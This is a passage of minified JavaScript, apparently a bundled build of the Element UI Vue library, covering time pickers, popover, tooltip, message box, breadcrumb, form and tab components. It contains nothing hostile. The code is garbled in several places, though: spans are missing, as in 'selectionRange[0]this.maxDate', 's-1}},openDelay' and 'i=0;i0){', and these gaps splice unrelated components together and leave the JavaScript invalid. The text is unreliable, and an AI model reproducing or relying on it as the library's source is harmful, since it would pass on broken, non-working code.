t=(e||"").split(":");if(t.length>=2){var i=parseInt(t[0],10),n=parseInt(t[1],10);return{hours:i,minutes:n}}return null},Ia=function(e,t){var i=Na(e),n=Na(t),s=i.minutes+60*i.hours,r=n.minutes+60*n.hours;return s===r?0:s>r?1:-1},ja=function(e){return(e.hours<10?"0"+e.hours:e.hours)+":"+(e.minutes<10?"0"+e.minutes:e.minutes)},Fa=function(e,t){var i=Na(e),n=Na(t),s={hours:i.hours,minutes:i.minutes};return s.minutes+=n.minutes,s.hours+=n.hours,s.hours+=Math.floor(s.minutes/60),s.minutes=s.minutes%60,ja(s)},La={components:{ElScrollbar:q.a},watch:{value:function(e){var t=this;e&&this.$nextTick((function(){return t.scrollToOption()}))}},methods:{handleClick:function(e){e.disabled||this.$emit("pick",e.value)},handleClear:function(){this.$emit("pick",null)},scrollToOption:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:".selected",t=this.$refs.popper.querySelector(".el-picker-panel__content");tn()(t,t.querySelector(e))},handleMenuEnter:function(){var e=this,t=-1!==this.items.map((function(e){return e.value})).indexOf(this.value),i=-1!==this.items.map((function(e){return e.value})).indexOf(this.defaultValue),n=(t?".selected":i&&".default")||".time-select-item:not(.disabled)";this.$nextTick((function(){return e.scrollToOption(n)}))},scrollDown:function(e){var t=this.items,i=t.length,n=t.length,s=t.map((function(e){return e.value})).indexOf(this.value);while(n--)if(s=(s+e+i)%i,!t[s].disabled)return void this.$emit("pick",t[s].value,!0)},isValidValue:function(e){return-1!==this.items.filter((function(e){return!e.disabled})).map((function(e){return e.value})).indexOf(e)},handleKeydown:function(e){var t=e.keyCode;if(38===t||40===t){var i={40:1,38:-1},n=i[t.toString()];return this.scrollDown(n),void e.stopPropagation()}}},data:function(){return{popperClass:"",start:"09:00",end:"18:00",step:"00:30",value:"",defaultValue:"",visible:!1,minTime:"",maxTime:"",width:0}},computed:{items:function(){var e=this.start,t=this.end,i=this.step,n=[];if(e&&t&&i){var s=e;while(Ia(s,t)<=0)n.push({value:s,disabled:Ia(s,this.minTime||"-1:-1")<=0||Ia(s,this.maxTime||"100:100")>=0}),s=Fa(s,i)}return n}}},Aa=La,Va=o(Aa,Pa,Ma,!1,null,null,null);Va.options.__file="packages/date-picker/src/panel/time-select.vue";var Ba=Va.exports,za={mixins:[kr],name:"ElTimeSelect",componentName:"ElTimeSelect",props:{type:{type:String,default:"time-select"}},beforeCreate:function(){this.panel=Ba},install:function(e){e.component(za.name,za)}},Ra=za,Ha=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("transition",{attrs:{name:"el-zoom-in-top"},on:{"after-leave":function(t){e.$emit("dodestroy")}}},[i("div",{directives:[{name:"show",rawName:"v-show",value:e.visible,expression:"visible"}],staticClass:"el-time-range-picker el-picker-panel el-popper",class:e.popperClass},[i("div",{staticClass:"el-time-range-picker__content"},[i("div",{staticClass:"el-time-range-picker__cell"},[i("div",{staticClass:"el-time-range-picker__header"},[e._v(e._s(e.t("el.datepicker.startTime")))]),i("div",{staticClass:"el-time-range-picker__body el-time-panel__content",class:{"has-seconds":e.showSeconds,"is-arrow":e.arrowControl}},[i("time-spinner",{ref:"minSpinner",attrs:{"show-seconds":e.showSeconds,"am-pm-mode":e.amPmMode,"arrow-control":e.arrowControl,date:e.minDate},on:{change:e.handleMinChange,"select-range":e.setMinSelectionRange}})],1)]),i("div",{staticClass:"el-time-range-picker__cell"},[i("div",{staticClass:"el-time-range-picker__header"},[e._v(e._s(e.t("el.datepicker.endTime")))]),i("div",{staticClass:"el-time-range-picker__body el-time-panel__content",class:{"has-seconds":e.showSeconds,"is-arrow":e.arrowControl}},[i("time-spinner",{ref:"maxSpinner",attrs:{"show-seconds":e.showSeconds,"am-pm-mode":e.amPmMode,"arrow-control":e.arrowControl,date:e.maxDate},on:{change:e.handleMaxChange,"select-range":e.setMaxSelectionRange}})],1)])]),i("div",{staticClass:"el-time-panel__footer"},[i("button",{staticClass:"el-time-panel__btn cancel",attrs:{type:"button"},on:{click:function(t){e.handleCancel()}}},[e._v(e._s(e.t("el.datepicker.cancel")))]),i("button",{staticClass:"el-time-panel__btn confirm",attrs:{type:"button",disabled:e.btnDisabled},on:{click:function(t){e.handleConfirm()}}},[e._v(e._s(e.t("el.datepicker.confirm")))])])])])},Wa=[];Ha._withStripped=!0;var qa=Object(ar["parseDate"])("00:00:00","HH:mm:ss"),Ya=Object(ar["parseDate"])("23:59:59","HH:mm:ss"),Ka=function(e){return Object(ar["modifyDate"])(qa,e.getFullYear(),e.getMonth(),e.getDate())},Ua=function(e){return Object(ar["modifyDate"])(Ya,e.getFullYear(),e.getMonth(),e.getDate())},Ga=function(e,t){return new Date(Math.min(e.getTime()+t,Ua(e).getTime()))},Xa={mixins:[g.a],components:{TimeSpinner:Ir},computed:{showSeconds:function(){return-1!==(this.format||"").indexOf("ss")},offset:function(){return this.showSeconds?11:8},spinner:function(){return this.selectionRange[0]this.maxDate.getTime()},amPmMode:function(){return-1!==(this.format||"").indexOf("A")?"A":-1!==(this.format||"").indexOf("a")?"a":""}},data:function(){return{popperClass:"",minDate:new Date,maxDate:new Date,value:[],oldValue:[new Date,new Date],defaultValue:null,format:"HH:mm:ss",visible:!1,selectionRange:[0,2],arrowControl:!1}},watch:{value:function(e){Array.isArray(e)?(this.minDate=new Date(e[0]),this.maxDate=new Date(e[1])):Array.isArray(this.defaultValue)?(this.minDate=new Date(this.defaultValue[0]),this.maxDate=new Date(this.defaultValue[1])):this.defaultValue?(this.minDate=new Date(this.defaultValue),this.maxDate=Ga(new Date(this.defaultValue),36e5)):(this.minDate=new Date,this.maxDate=Ga(new Date,36e5))},visible:function(e){var t=this;e&&(this.oldValue=this.value,this.$nextTick((function(){return t.$refs.minSpinner.emitSelectRange("hours")})))}},methods:{handleClear:function(){this.$emit("pick",null)},handleCancel:function(){this.$emit("pick",this.oldValue)},handleMinChange:function(e){this.minDate=Object(ar["clearMilliseconds"])(e),this.handleChange()},handleMaxChange:function(e){this.maxDate=Object(ar["clearMilliseconds"])(e),this.handleChange()},handleChange:function(){this.isValidValue([this.minDate,this.maxDate])&&(this.$refs.minSpinner.selectableRange=[[Ka(this.minDate),this.maxDate]],this.$refs.maxSpinner.selectableRange=[[this.minDate,Ua(this.maxDate)]],this.$emit("pick",[this.minDate,this.maxDate],!0))},setMinSelectionRange:function(e,t){this.$emit("select-range",e,t,"min"),this.selectionRange=[e,t]},setMaxSelectionRange:function(e,t){this.$emit("select-range",e,t,"max"),this.selectionRange=[e+this.offset,t+this.offset]},handleConfirm:function(){var e=arguments.length>0&&void 0!==arguments[0]&&arguments[0],t=this.$refs.minSpinner.selectableRange,i=this.$refs.maxSpinner.selectableRange;this.minDate=Object(ar["limitTimeRange"])(this.minDate,t,this.format),this.maxDate=Object(ar["limitTimeRange"])(this.maxDate,i,this.format),this.$emit("pick",[this.minDate,this.maxDate],e)},adjustSpinners:function(){this.$refs.minSpinner.adjustSpinners(),this.$refs.maxSpinner.adjustSpinners()},changeSelectionRange:function(e){var t=this.showSeconds?[0,3,6,11,14,17]:[0,3,8,11],i=["hours","minutes"].concat(this.showSeconds?["seconds"]:[]),n=t.indexOf(this.selectionRange[0]),s=(n+e+t.length)%t.length,r=t.length/2;s-1}},openDelay:{type:Number,default:0},closeDelay:{type:Number,default:200},title:String,disabled:Boolean,content:String,reference:{},popperClass:String,width:{},visibleArrow:{default:!0},arrowOffset:{type:Number,default:0},transition:{type:String,default:"fade-in-linear"},tabindex:{type:Number,default:0}},computed:{tooltipId:function(){return"el-popover-"+Object(b["generateId"])()}},watch:{showPopper:function(e){this.disabled||(e?this.$emit("show"):this.$emit("hide"))}},mounted:function(){var e=this,t=this.referenceElm=this.reference||this.$refs.reference,i=this.popper||this.$refs.popper;!t&&this.$refs.wrapper.children&&(t=this.referenceElm=this.$refs.wrapper.children[0]),t&&(Object(Ae["addClass"])(t,"el-popover__reference"),t.setAttribute("aria-describedby",this.tooltipId),t.setAttribute("tabindex",this.tabindex),i.setAttribute("tabindex",0),"click"!==this.trigger&&(Object(Ae["on"])(t,"focusin",(function(){e.handleFocus();var i=t.__vue__;i&&"function"===typeof i.focus&&i.focus()})),Object(Ae["on"])(i,"focusin",this.handleFocus),Object(Ae["on"])(t,"focusout",this.handleBlur),Object(Ae["on"])(i,"focusout",this.handleBlur)),Object(Ae["on"])(t,"keydown",this.handleKeydown),Object(Ae["on"])(t,"click",this.handleClick)),"click"===this.trigger?(Object(Ae["on"])(t,"click",this.doToggle),Object(Ae["on"])(document,"click",this.handleDocumentClick)):"hover"===this.trigger?(Object(Ae["on"])(t,"mouseenter",this.handleMouseEnter),Object(Ae["on"])(i,"mouseenter",this.handleMouseEnter),Object(Ae["on"])(t,"mouseleave",this.handleMouseLeave),Object(Ae["on"])(i,"mouseleave",this.handleMouseLeave)):"focus"===this.trigger&&(this.tabindex<0&&console.warn("[Element Warn][Popover]a negative taindex means that the element cannot be focused by tab key"),t.querySelector("input, textarea")?(Object(Ae["on"])(t,"focusin",this.doShow),Object(Ae["on"])(t,"focusout",this.doClose)):(Object(Ae["on"])(t,"mousedown",this.doShow),Object(Ae["on"])(t,"mouseup",this.doClose)))},beforeDestroy:function(){this.cleanup()},deactivated:function(){this.cleanup()},methods:{doToggle:function(){this.showPopper=!this.showPopper},doShow:function(){this.showPopper=!0},doClose:function(){this.showPopper=!1},handleFocus:function(){Object(Ae["addClass"])(this.referenceElm,"focusing"),"click"!==this.trigger&&"focus"!==this.trigger||(this.showPopper=!0)},handleClick:function(){Object(Ae["removeClass"])(this.referenceElm,"focusing")},handleBlur:function(){Object(Ae["removeClass"])(this.referenceElm,"focusing"),"click"!==this.trigger&&"focus"!==this.trigger||(this.showPopper=!1)},handleMouseEnter:function(){var e=this;clearTimeout(this._timer),this.openDelay?this._timer=setTimeout((function(){e.showPopper=!0}),this.openDelay):this.showPopper=!0},handleKeydown:function(e){27===e.keyCode&&"manual"!==this.trigger&&this.doClose()},handleMouseLeave:function(){var e=this;clearTimeout(this._timer),this.closeDelay?this._timer=setTimeout((function(){e.showPopper=!1}),this.closeDelay):this.showPopper=!1},handleDocumentClick:function(e){var t=this.reference||this.$refs.reference,i=this.popper||this.$refs.popper;!t&&this.$refs.wrapper.children&&(t=this.referenceElm=this.$refs.wrapper.children[0]),this.$el&&t&&!this.$el.contains(e.target)&&!t.contains(e.target)&&i&&!i.contains(e.target)&&(this.showPopper=!1)},handleAfterEnter:function(){this.$emit("after-enter")},handleAfterLeave:function(){this.$emit("after-leave"),this.doDestroy()},cleanup:function(){(this.openDelay||this.closeDelay)&&clearTimeout(this._timer)}},destroyed:function(){var e=this.reference;Object(Ae["off"])(e,"click",this.doToggle),Object(Ae["off"])(e,"mouseup",this.doClose),Object(Ae["off"])(e,"mousedown",this.doShow),Object(Ae["off"])(e,"focusin",this.doShow),Object(Ae["off"])(e,"focusout",this.doClose),Object(Ae["off"])(e,"mousedown",this.doShow),Object(Ae["off"])(e,"mouseup",this.doClose),Object(Ae["off"])(e,"mouseleave",this.handleMouseLeave),Object(Ae["off"])(e,"mouseenter",this.handleMouseEnter),Object(Ae["off"])(document,"click",this.handleDocumentClick)}},ro=so,ao=o(ro,io,no,!1,null,null,null);ao.options.__file="packages/popover/src/main.vue";var oo=ao.exports,lo=function(e,t,i){var n=t.expression?t.value:t.arg,s=i.context.$refs[n];s&&(Array.isArray(s)?s[0].$refs.reference=e:s.$refs.reference=e)},co={bind:function(e,t,i){lo(e,t,i)},inserted:function(e,t,i){lo(e,t,i)}};Rn.a.directive("popover",co),oo.install=function(e){e.directive("popover",co),e.component(oo.name,oo)},oo.directive=co;var uo=oo,ho={name:"ElTooltip",mixins:[H.a],props:{openDelay:{type:Number,default:0},disabled:Boolean,manual:Boolean,effect:{type:String,default:"dark"},arrowOffset:{type:Number,default:0},popperClass:String,content:String,visibleArrow:{default:!0},transition:{type:String,default:"el-fade-in-linear"},popperOptions:{default:function(){return{boundariesPadding:10,gpuAcceleration:!1}}},enterable:{type:Boolean,default:!0},hideAfter:{type:Number,default:0},tabindex:{type:Number,default:0}},data:function(){return{tooltipId:"el-tooltip-"+Object(b["generateId"])(),timeoutPending:null,focusing:!1}},beforeCreate:function(){var e=this;this.$isServer||(this.popperVM=new Rn.a({data:{node:""},render:function(e){return this.node}}).$mount(),this.debounceClose=L()(200,(function(){return e.handleClosePopper()})))},render:function(e){var t=this;this.popperVM&&(this.popperVM.node=e("transition",{attrs:{name:this.transition},on:{afterLeave:this.doDestroy}},[e("div",{on:{mouseleave:function(){t.setExpectedState(!1),t.debounceClose()},mouseenter:function(){t.setExpectedState(!0)}},ref:"popper",attrs:{role:"tooltip",id:this.tooltipId,"aria-hidden":this.disabled||!this.showPopper?"true":"false"},directives:[{name:"show",value:!this.disabled&&this.showPopper}],class:["el-tooltip__popper","is-"+this.effect,this.popperClass]},[this.$slots.content||this.content])]));var i=this.getFirstElement();if(!i)return null;var n=i.data=i.data||{};return n.staticClass=this.addTooltipClass(n.staticClass),i},mounted:function(){var e=this;this.referenceElm=this.$el,1===this.$el.nodeType&&(this.$el.setAttribute("aria-describedby",this.tooltipId),this.$el.setAttribute("tabindex",this.tabindex),Object(Ae["on"])(this.referenceElm,"mouseenter",this.show),Object(Ae["on"])(this.referenceElm,"mouseleave",this.hide),Object(Ae["on"])(this.referenceElm,"focus",(function(){if(e.$slots.default&&e.$slots.default.length){var t=e.$slots.default[0].componentInstance;t&&t.focus?t.focus():e.handleFocus()}else e.handleFocus()})),Object(Ae["on"])(this.referenceElm,"blur",this.handleBlur),Object(Ae["on"])(this.referenceElm,"click",this.removeFocusing)),this.value&&this.popperVM&&this.popperVM.$nextTick((function(){e.value&&e.updatePopper()}))},watch:{focusing:function(e){e?Object(Ae["addClass"])(this.referenceElm,"focusing"):Object(Ae["removeClass"])(this.referenceElm,"focusing")}},methods:{show:function(){this.setExpectedState(!0),this.handleShowPopper()},hide:function(){this.setExpectedState(!1),this.debounceClose()},handleFocus:function(){this.focusing=!0,this.show()},handleBlur:function(){this.focusing=!1,this.hide()},removeFocusing:function(){this.focusing=!1},addTooltipClass:function(e){return e?"el-tooltip "+e.replace("el-tooltip",""):"el-tooltip"},handleShowPopper:function(){var e=this;this.expectedState&&!this.manual&&(clearTimeout(this.timeout),this.timeout=setTimeout((function(){e.showPopper=!0}),this.openDelay),this.hideAfter>0&&(this.timeoutPending=setTimeout((function(){e.showPopper=!1}),this.hideAfter)))},handleClosePopper:function(){this.enterable&&this.expectedState||this.manual||(clearTimeout(this.timeout),this.timeoutPending&&clearTimeout(this.timeoutPending),this.showPopper=!1,this.disabled&&this.doDestroy())},setExpectedState:function(e){!1===e&&clearTimeout(this.timeoutPending),this.expectedState=e},getFirstElement:function(){var e=this.$slots.default;if(!Array.isArray(e))return null;for(var t=null,i=0;i0){To=Mo.shift();var t=To.options;for(var i in t)t.hasOwnProperty(i)&&(Po[i]=t[i]);void 0===t.callback&&(Po.callback=No);var n=Po.callback;Po.callback=function(t,i){n(t,i),e()},Object(Do["isVNode"])(Po.message)?(Po.$slots.default=[Po.message],Po.message=null):delete Po.$slots.default,["modal","showClose","closeOnClickModal","closeOnPressEscape","closeOnHashChange"].forEach((function(e){void 0===Po[e]&&(Po[e]=!0)})),document.body.appendChild(Po.$el),Rn.a.nextTick((function(){Po.visible=!0}))}},Fo=function e(t,i){if(!Rn.a.prototype.$isServer){if("string"===typeof t||Object(Do["isVNode"])(t)?(t={message:t},"string"===typeof arguments[1]&&(t.title=arguments[1])):t.callback&&!i&&(i=t.callback),"undefined"!==typeof Promise)return new Promise((function(n,s){Mo.push({options:St()({},Oo,e.defaults,t),callback:i,resolve:n,reject:s}),jo()}));Mo.push({options:St()({},Oo,e.defaults,t),callback:i}),jo()}};Fo.setDefaults=function(e){Fo.defaults=e},Fo.alert=function(e,t,i){return"object"===("undefined"===typeof t?"undefined":$o(t))?(i=t,t=""):void 0===t&&(t=""),Fo(St()({title:t,message:e,$type:"alert",closeOnPressEscape:!1,closeOnClickModal:!1},i))},Fo.confirm=function(e,t,i){return"object"===("undefined"===typeof t?"undefined":$o(t))?(i=t,t=""):void 0===t&&(t=""),Fo(St()({title:t,message:e,$type:"confirm",showCancelButton:!0},i))},Fo.prompt=function(e,t,i){return"object"===("undefined"===typeof t?"undefined":$o(t))?(i=t,t=""):void 0===t&&(t=""),Fo(St()({title:t,message:e,showCancelButton:!0,showInput:!0,$type:"prompt"},i))},Fo.close=function(){Po.doClose(),Po.visible=!1,Mo=[],To=null};var Lo=Fo,Ao=Lo,Vo=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{staticClass:"el-breadcrumb",attrs:{"aria-label":"Breadcrumb",role:"navigation"}},[e._t("default")],2)},Bo=[];Vo._withStripped=!0;var zo={name:"ElBreadcrumb",props:{separator:{type:String,default:"/"},separatorClass:{type:String,default:""}},provide:function(){return{elBreadcrumb:this}},mounted:function(){var e=this.$el.querySelectorAll(".el-breadcrumb__item");e.length&&e[e.length-1].setAttribute("aria-current","page")}},Ro=zo,Ho=o(Ro,Vo,Bo,!1,null,null,null);Ho.options.__file="packages/breadcrumb/src/breadcrumb.vue";var Wo=Ho.exports;Wo.install=function(e){e.component(Wo.name,Wo)};var qo=Wo,Yo=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("span",{staticClass:"el-breadcrumb__item"},[i("span",{ref:"link",class:["el-breadcrumb__inner",e.to?"is-link":""],attrs:{role:"link"}},[e._t("default")],2),e.separatorClass?i("i",{staticClass:"el-breadcrumb__separator",class:e.separatorClass}):i("span",{staticClass:"el-breadcrumb__separator",attrs:{role:"presentation"}},[e._v(e._s(e.separator))])])},Ko=[];Yo._withStripped=!0;var Uo={name:"ElBreadcrumbItem",props:{to:{},replace:Boolean},data:function(){return{separator:"",separatorClass:""}},inject:["elBreadcrumb"],mounted:function(){var e=this;this.separator=this.elBreadcrumb.separator,this.separatorClass=this.elBreadcrumb.separatorClass;var t=this.$refs.link;t.setAttribute("role","link"),t.addEventListener("click",(function(t){var i=e.to,n=e.$router;i&&n&&(e.replace?n.replace(i):n.push(i))}))}},Go=Uo,Xo=o(Go,Yo,Ko,!1,null,null,null);Xo.options.__file="packages/breadcrumb/src/breadcrumb-item.vue";var Zo=Xo.exports;Zo.install=function(e){e.component(Zo.name,Zo)};var Qo=Zo,Jo=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("form",{staticClass:"el-form",class:[e.labelPosition?"el-form--label-"+e.labelPosition:"",{"el-form--inline":e.inline}]},[e._t("default")],2)},el=[];Jo._withStripped=!0;var tl={name:"ElForm",componentName:"ElForm",provide:function(){return{elForm:this}},props:{model:Object,rules:Object,labelPosition:String,labelWidth:String,labelSuffix:{type:String,default:""},inline:Boolean,inlineMessage:Boolean,statusIcon:Boolean,showMessage:{type:Boolean,default:!0},size:String,disabled:Boolean,validateOnRuleChange:{type:Boolean,default:!0},hideRequiredAsterisk:{type:Boolean,default:!1}},watch:{rules:function(){this.fields.forEach((function(e){e.removeValidateEvents(),e.addValidateEvents()})),this.validateOnRuleChange&&this.validate((function(){}))}},computed:{autoLabelWidth:function(){if(!this.potentialLabelWidthArr.length)return 0;var e=Math.max.apply(Math,this.potentialLabelWidthArr);return e?e+"px":""}},data:function(){return{fields:[],potentialLabelWidthArr:[]}},created:function(){var e=this;this.$on("el.form.addField",(function(t){t&&e.fields.push(t)})),this.$on("el.form.removeField",(function(t){t.prop&&e.fields.splice(e.fields.indexOf(t),1)}))},methods:{resetFields:function(){this.model?this.fields.forEach((function(e){e.resetField()})):console.warn("[Element Warn][Form]model is required for resetFields to work.")},clearValidate:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:[],t=e.length?"string"===typeof e?this.fields.filter((function(t){return e===t.prop})):this.fields.filter((function(t){return e.indexOf(t.prop)>-1})):this.fields;t.forEach((function(e){e.clearValidate()}))},validate:function(e){var t=this;if(this.model){var i=void 0;"function"!==typeof e&&window.Promise&&(i=new window.Promise((function(t,i){e=function(e,n){e?t(e):i(n)}})));var n=!0,s=0;0===this.fields.length&&e&&e(!0);var r={};return this.fields.forEach((function(i){i.validate("",(function(i,a){i&&(n=!1),r=St()({},r,a),"function"===typeof e&&++s===t.fields.length&&e(n,r)}))})),i||void 0}console.warn("[Element Warn][Form]model is required for validate to work!")},validateField:function(e,t){e=[].concat(e);var i=this.fields.filter((function(t){return-1!==e.indexOf(t.prop)}));i.length?i.forEach((function(e){e.validate("",t)})):console.warn("[Element Warn]please pass correct props!")},getLabelWidthIndex:function(e){var t=this.potentialLabelWidthArr.indexOf(e);if(-1===t)throw new Error("[ElementForm]unpected width ",e);return t},registerLabelWidth:function(e,t){if(e&&t){var i=this.getLabelWidthIndex(t);this.potentialLabelWidthArr.splice(i,1,e)}else e&&this.potentialLabelWidthArr.push(e)},deregisterLabelWidth:function(e){var t=this.getLabelWidthIndex(e);this.potentialLabelWidthArr.splice(t,1)}}},il=tl,nl=o(il,Jo,el,!1,null,null,null);nl.options.__file="packages/form/src/form.vue";var sl=nl.exports;sl.install=function(e){e.component(sl.name,sl)};var rl=sl,al=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{staticClass:"el-form-item",class:[{"el-form-item--feedback":e.elForm&&e.elForm.statusIcon,"is-error":"error"===e.validateState,"is-validating":"validating"===e.validateState,"is-success":"success"===e.validateState,"is-required":e.isRequired||e.required,"is-no-asterisk":e.elForm&&e.elForm.hideRequiredAsterisk},e.sizeClass?"el-form-item--"+e.sizeClass:""]},[i("label-wrap",{attrs:{"is-auto-width":e.labelStyle&&"auto"===e.labelStyle.width,"update-all":"auto"===e.form.labelWidth}},[e.label||e.$slots.label?i("label",{staticClass:"el-form-item__label",style:e.labelStyle,attrs:{for:e.labelFor}},[e._t("label",[e._v(e._s(e.label+e.form.labelSuffix))])],2):e._e()]),i("div",{staticClass:"el-form-item__content",style:e.contentStyle},[e._t("default"),i("transition",{attrs:{name:"el-zoom-in-top"}},["error"===e.validateState&&e.showMessage&&e.form.showMessage?e._t("error",[i("div",{staticClass:"el-form-item__error",class:{"el-form-item__error--inline":"boolean"===typeof e.inlineMessage?e.inlineMessage:e.elForm&&e.elForm.inlineMessage||!1}},[e._v("\n "+e._s(e.validateMessage)+"\n ")])],{error:e.validateMessage}):e._e()],2)],2)],1)},ol=[];al._withStripped=!0;var ll,cl,ul=i(40),hl=i.n(ul),dl={props:{isAutoWidth:Boolean,updateAll:Boolean},inject:["elForm","elFormItem"],render:function(){var e=arguments[0],t=this.$slots.default;if(!t)return null;if(this.isAutoWidth){var i=this.elForm.autoLabelWidth,n={};if(i&&"auto"!==i){var s=parseInt(i,10)-this.computedWidth;s&&(n.marginLeft=s+"px")}return e("div",{class:"el-form-item__label-wrap",style:n},[t])}return t[0]},methods:{getLabelWidth:function(){if(this.$el&&this.$el.firstElementChild){var e=window.getComputedStyle(this.$el.firstElementChild).width;return Math.ceil(parseFloat(e))}return 0},updateLabelWidth:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:"update";this.$slots.default&&this.isAutoWidth&&this.$el.firstElementChild&&("update"===e?this.computedWidth=this.getLabelWidth():"remove"===e&&this.elForm.deregisterLabelWidth(this.computedWidth))}},watch:{computedWidth:function(e,t){this.updateAll&&(this.elForm.registerLabelWidth(e,t),this.elFormItem.updateComputedLabelWidth(e))}},data:function(){return{computedWidth:0}},mounted:function(){this.updateLabelWidth("update")},updated:function(){this.updateLabelWidth("update")},beforeDestroy:function(){this.updateLabelWidth("remove")}},pl=dl,fl=o(pl,ll,cl,!1,null,null,null);fl.options.__file="packages/form/src/label-wrap.vue";var ml=fl.exports,vl={name:"ElFormItem",componentName:"ElFormItem",mixins:[O.a],provide:function(){return{elFormItem:this}},inject:["elForm"],props:{label:String,labelWidth:String,prop:String,required:{type:Boolean,default:void 0},rules:[Object,Array],error:String,validateStatus:String,for:String,inlineMessage:{type:[String,Boolean],default:""},showMessage:{type:Boolean,default:!0},size:String},components:{LabelWrap:ml},watch:{error:{immediate:!0,handler:function(e){this.validateMessage=e,this.validateState=e?"error":""}},validateStatus:function(e){this.validateState=e}},computed:{labelFor:function(){return this.for||this.prop},labelStyle:function(){var e={};if("top"===this.form.labelPosition)return e;var t=this.labelWidth||this.form.labelWidth;return t&&(e.width=t),e},contentStyle:function(){var e={},t=this.label;if("top"===this.form.labelPosition||this.form.inline)return e;if(!t&&!this.labelWidth&&this.isNested)return e;var i=this.labelWidth||this.form.labelWidth;return"auto"===i?"auto"===this.labelWidth?e.marginLeft=this.computedLabelWidth:"auto"===this.form.labelWidth&&(e.marginLeft=this.elForm.autoLabelWidth):e.marginLeft=i,e},form:function(){var e=this.$parent,t=e.$options.componentName;while("ElForm"!==t)"ElFormItem"===t&&(this.isNested=!0),e=e.$parent,t=e.$options.componentName;return e},fieldValue:function(){var e=this.form.model;if(e&&this.prop){var t=this.prop;return-1!==t.indexOf(":")&&(t=t.replace(/:/,".")),Object(b["getPropByPath"])(e,t,!0).v}},isRequired:function(){var e=this.getRules(),t=!1;return e&&e.length&&e.every((function(e){return!e.required||(t=!0,!1)})),t},_formSize:function(){return this.elForm.size},elFormItemSize:function(){return this.size||this._formSize},sizeClass:function(){return this.elFormItemSize||(this.$ELEMENT||{}).size}},data:function(){return{validateState:"",validateMessage:"",validateDisabled:!1,validator:{},isNested:!1,computedLabelWidth:""}},methods:{validate:function(e){var t=this,i=arguments.length>1&&void 0!==arguments[1]?arguments[1]:b["noop"];this.validateDisabled=!1;var n=this.getFilteredRule(e);if((!n||0===n.length)&&void 0===this.required)return i(),!0;this.validateState="validating";var s={};n&&n.length>0&&n.forEach((function(e){delete e.trigger})),s[this.prop]=n;var r=new hl.a(s),a={};a[this.prop]=this.fieldValue,r.validate(a,{firstFields:!0},(function(e,n){t.validateState=e?"error":"success",t.validateMessage=e?e[0].message:"",i(t.validateMessage,n),t.elForm&&t.elForm.$emit("validate",t.prop,!e,t.validateMessage||null)}))},clearValidate:function(){this.validateState="",this.validateMessage="",this.validateDisabled=!1},resetField:function(){var e=this;this.validateState="",this.validateMessage="";var t=this.form.model,i=this.fieldValue,n=this.prop;-1!==n.indexOf(":")&&(n=n.replace(/:/,"."));var s=Object(b["getPropByPath"])(t,n,!0);this.validateDisabled=!0,Array.isArray(i)?s.o[s.k]=[].concat(this.initialValue):s.o[s.k]=this.initialValue,this.$nextTick((function(){e.validateDisabled=!1})),this.broadcast("ElTimeSelect","fieldReset",this.initialValue)},getRules:function(){var e=this.form.rules,t=this.rules,i=void 0!==this.required?{required:!!this.required}:[],n=Object(b["getPropByPath"])(e,this.prop||"");return e=e?n.o[this.prop||""]||n.v:[],[].concat(t||e||[]).concat(i)},getFilteredRule:function(e){var t=this.getRules();return t.filter((function(t){return!t.trigger||""===e||(Array.isArray(t.trigger)?t.trigger.indexOf(e)>-1:t.trigger===e)})).map((function(e){return St()({},e)}))},onFieldBlur:function(){this.validate("blur")},onFieldChange:function(){this.validateDisabled?this.validateDisabled=!1:this.validate("change")},updateComputedLabelWidth:function(e){this.computedLabelWidth=e?e+"px":""},addValidateEvents:function(){var e=this.getRules();(e.length||void 0!==this.required)&&(this.$on("el.form.blur",this.onFieldBlur),this.$on("el.form.change",this.onFieldChange))},removeValidateEvents:function(){this.$off()}},mounted:function(){if(this.prop){this.dispatch("ElForm","el.form.addField",[this]);var e=this.fieldValue;Array.isArray(e)&&(e=[].concat(e)),Object.defineProperty(this,"initialValue",{value:e}),this.addValidateEvents()}},beforeDestroy:function(){this.dispatch("ElForm","el.form.removeField",[this])}},gl=vl,bl=o(gl,al,ol,!1,null,null,null);bl.options.__file="packages/form/src/form-item.vue";var yl=bl.exports;yl.install=function(e){e.component(yl.name,yl)};var _l=yl,xl=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{staticClass:"el-tabs__active-bar",class:"is-"+e.rootTabs.tabPosition,style:e.barStyle})},Cl=[];xl._withStripped=!0;var wl={name:"TabBar",props:{tabs:Array},inject:["rootTabs"],computed:{barStyle:{get:function(){var e=this,t={},i=0,n=0,s=-1!==["top","bottom"].indexOf(this.rootTabs.tabPosition)?"width":"height",r="width"===s?"x":"y",a=function(e){return e.toLowerCase().replace(/( |^)[a-z]/g,(function(e){return e.toUpperCase()}))};this.tabs.every((function(t,r){var o=Object(b["arrayFind"])(e.$parent.$refs.tabs||[],(function(e){return e.id.replace("tab-","")===t.paneName}));if(!o)return!1;if(t.active){n=o["client"+a(s)];var l=window.getComputedStyle(o);return"width"===s&&e.tabs.length>1&&(n-=parseFloat(l.paddingLeft)+parseFloat(l.paddingRight)),"width"===s&&(i+=parseFloat(l.paddingLeft)),!1}return i+=o["client"+a(s)],!0}));var o="translate"+a(r)+"("+i+"px)";return t[s]=n+"px",t.transform=o,t.msTransform=o,t.webkitTransform=o,t}}}},kl=wl,Sl=o(kl,xl,Cl,!1,null,null,null);Sl.options.__file="packages/tabs/src/tab-bar.vue";var Dl=Sl.exports;function $l(){}var Ol,El,Tl=function(e){return e.toLowerCase().replace(/( |^)[a-z]/g,(function(e){return e.toUpperCase()}))},Pl={name:"TabNav",components:{TabBar:Dl},inject:["rootTabs"],props:{panes:Array,currentName:String,editable:Boolean,onTabClick:{type:Function,default:$l},onTabRemove:{type:Function,default:$l},type:String,stretch:Boolean},data:function(){return{scrollable:!1,navOffset:0,isFocus:!1,focusable:!0}},computed:{navStyle:function(){var e=-1!==["top","bottom"].indexOf(this.rootTabs.tabPosition)?"X":"Y";return{transform:"translate"+e+"(-"+this.navOffset+"px)"}},sizeName:function(){return-1!==["top","bottom"].indexOf(this.rootTabs.tabPosition)?"width":"height"}},methods:{scrollPrev:function(){var 